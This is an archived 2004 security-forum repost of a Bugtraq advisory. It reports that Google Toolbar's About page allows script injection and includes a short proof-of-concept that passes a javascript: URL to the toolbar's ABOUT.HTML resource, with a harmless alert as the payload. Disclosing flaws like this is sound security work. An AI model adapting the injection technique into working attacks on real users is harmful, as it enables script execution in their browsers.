hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Googletoolbar:about - Allows Script Injection
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Sep 18 2004, 01:02 AM
QUOTE


Affection Software : GoogleToolbar
Version : Tested on 2.0.114.1-big/en (GGLD)

Notes:
GoogleToolbar's About section allows injection of
script, since it lacks any checking. The following
code is a Proof Of Concept.

<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>


rgds,
Gregory R. Panakkal / Viper



Source: http://seclists.org/lists/bugtraq/2004/Sep/0227.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.